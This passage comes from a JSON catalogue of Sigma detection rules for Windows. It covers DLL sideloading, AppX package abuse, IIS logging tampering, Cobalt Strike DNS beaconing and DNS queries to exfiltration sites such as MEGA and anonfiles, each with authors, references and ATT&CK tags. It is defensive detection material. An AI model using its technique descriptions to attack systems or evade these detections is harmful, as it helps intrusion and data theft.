"https://twitter.com/gentilkiwi/status/861641945944391680", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" }, { "description": "Detects when a DNS zone transfer failed.", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-24", "falsepositive": [ "Unlikely" ], "filename": "win_dns_server_failed_dns_zone_transfer.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml" ], "tags": [ "attack.reconnaissance", "attack.t1590.002" ] }, "related": [ { "dest-uuid": "0ff59227-8aa8-4c09-bf1f-925605bd07ea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d444368-6da1-43fe-b2fc-44202430480e", "value": "Failed DNS Zone Transfer" }, { "description": "Detects execution of AppX packages with known suspicious or malicious signature", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Unknown" ], "filename": "win_appxpackaging_om_sups_appx_signature.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "b5aa7d60-c17e-4538-97de-09029d6cd76b", "value": "Suspicious Digital Signature Of AppX Package" }, { "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Legitimate usage of the applications from the Windows Store" ], "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "value": "Sysinternals Tools AppX Versions Execution" }, { "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", "meta": { "author": "mdecrevoisier", "creation_date": "2022-10-25", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_sshd_openssh_server_listening_on_socket.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", "https://winaero.com/enable-openssh-server-windows-10/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.004" ] }, "related": [ { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "value": "OpenSSH Server Listening On Socket" }, { "description": "Detects the addition of a new module to an IIS server.", "meta": { "author": "frack113", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_iis_module_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview", "https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_module_added.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd857d3e-0c6e-457b-9b48-e82ae7f86bd7", "value": "New Module Module Added To IIS Server" }, { "description": "Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_iis_logging_etw_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5b40a90-baf5-4bf7-a6f7-373494881d22", "value": "ETW Logging/Processing Option Disabled On IIS Server" }, { "description": "Detects the removal of a previously installed IIS module.", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_iis_module_removed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview", "https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_module_removed.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f", "value": "Previously Installed IIS Module Was Removed" }, { "description": "Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.", "meta": { "author": "frack113", "creation_date": "2024-10-06", "falsepositive": [ "Unknown" ], "filename": "win_iis_logging_http_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8ebd53a-30c2-45bd-81bb-74befba07bdb", "value": "HTTP Logging Disabled On IIS Server" }, { "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "filename": "win_lsa_server_normal_user_admin.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml", "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml" ], "tags": [ "attack.credential-access", "attack.privilege-escalation" ] }, "uuid": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "value": "Standard User In High Privileged Group" }, { "description": "Detects when an application acquires a certificate private key", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-13", "falsepositive": [ "Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed" ], "filename": "win_capi2_acquire_certificate_private_key.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml" ], "tags": [ "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2b5163d-7deb-4566-9af3-40afea6858c3", "value": "Certificate Private Key Acquired" }, { "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Unknown" ], "filename": "win_dns_client__mal_cobaltstrike.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.004" ] }, "related": [ { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "value": "Suspicious Cobalt Strike DNS Beaconing - DNS Client" }, { "description": "Detects DNS queries for subdomains related to \"Put.io\" sharing website.", "meta": { "author": "Omar Khaled (@beacon_exe)", "creation_date": "2024-08-23", "falsepositive": [ "Legitimate DNS queries and usage of Put.io" ], "filename": "win_dns_client_put_io.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_put_io.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "8b69fd42-9dad-4674-abef-7fdef43ef92a", "value": "DNS Query To Put.io - DNS Client" }, { "description": "Detects DNS resolution of an .onion address related to Tor routing networks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-20", "falsepositive": [ "Unlikely" ], "filename": "win_dns_client_tor_onion.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.003" ] }, "related": [ { "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "value": "Query Tor Onion Address - DNS Client" }, { "description": "Detects DNS queries for subdomains related to MEGA sharing website", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Legitimate DNS queries and usage of Mega" ], "filename": "win_dns_client_mega_nz.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66474410-b883-415f-9f8d-75345a0a66a6", "value": "DNS Query To MEGA Hosting Website - DNS Client" }, { "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Rare legitimate access to anonfiles.com" ], "filename": "win_dns_client_anonymfiles_com.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "value": "DNS Query for Anonfiles.com Domain - DNS Client" }, { "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "DNS queries for \"ufile\" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take" ], "filename": "win_dns_client_ufile_io.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "090ffaad-c01a-4879-850c-6d57da98452d", "value": "DNS Query To Ufile.io - DNS Client" }, { "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Packages or applications being legitimately used by users or administrators" ], "filename": "win_shell_core_susp_packages_installed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" ], "tags": [ "attack.execution" ] }, "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "value": "Suspicious Application Installed" }, { "description": "Detects an appx package deployment that was blocked by AppLocker policy", "meta": { "author": "frack113", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_applocker_block.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "value": "Deployment AppX Package Was Blocked By AppLocker" }, { "description": "Detects potential installation or installation attempts of known malicious appx packages", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], "filename": "win_appxdeployment_server_mal_appx_names.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "value": "Potential Malicious AppX Package Installation Attempts" }, { "description": "Detects an appx package deployment that was blocked by the local computer policy", "meta": { "author": "frack113", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_policy_block.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "value": "Deployment Of The AppX Package Was Blocked By The Policy" }, { "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_uncommon_package_locations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c977cb50-3dff-4a9f-b873-9290f56132f1", "value": "Uncommon AppX Package Locations" }, { "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Legitimate AppX packages not signed by MS used part of an enterprise" ], "filename": "win_appxdeployment_server_susp_appx_package_installation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "898d5fc9-fbc3-43de-93ad-38e97237c344", "value": "Suspicious AppX Package Installation Attempt" }, { "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_susp_package_locations.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "5cdeaf3d-1489-477c-95ab-c318559fc051", "value": "Suspicious AppX Package Locations" }, { "description": "Detects an appx package added to the pipeline of the \"to be processed\" packages which was downloaded from a suspicious domain.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_appxdeployment_server_susp_domains.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "8b48ad89-10d8-4382-a546-50588c410f0d", "value": "Suspicious Remote AppX Package Locations" }, { "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", "meta": { "author": "Den Iuzvyk", "creation_date": "2020-07-15", "falsepositive": [ "False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity" ], "filename": "image_load_dll_azure_microsoft_account_token_provider_dll_load.yml", "level": "low", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", "value": "Potential Azure Browser SSO Abuse" }, { "description": "Detects potential DLL sideloading of \"CCleanerDU.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-13", "falsepositive": [ "False positives could occur from other custom installation paths. Apply additional filters accordingly." ], "filename": "image_load_side_load_ccleaner_du.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lab52.io/blog/2344-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_du.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1fbc0671-5596-4e17-8682-f020a0b995dc", "value": "Potential CCleanerDU.DLL Sideloading" }, { "description": "Detects DSParse DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_dsparse_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dsparse_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", "value": "Active Directory Parsing DLL Loaded Via Office Application" }, { "description": "Detects SILENTTRINITY stager dll loading activity", "meta": { "author": "Aleksey Potapov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Unlikely" ], "filename": "image_load_hktl_silenttrinity_stager.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/SILENTTRINITY", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml" ], "tags": [ "attack.command-and-control", "attack.t1071" ] }, "related": [ { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "value": "HackTool - SILENTTRINITY Stager DLL Load" }, { "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-03-21", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_iviewers.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.secureworks.com/research/shadowpad-malware-analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_iviewers.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c21b805-4dd7-469f-b47d-7383a8fcb437", "value": "Potential Iviewers.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"appverifUI.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_appverifui.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_appverifui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee6cea48-c5b6-4304-a332-10fc6446f484", "value": "Potential appverifUI.DLL Sideloading" }, { "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-01", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_shell_chrome_api.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ 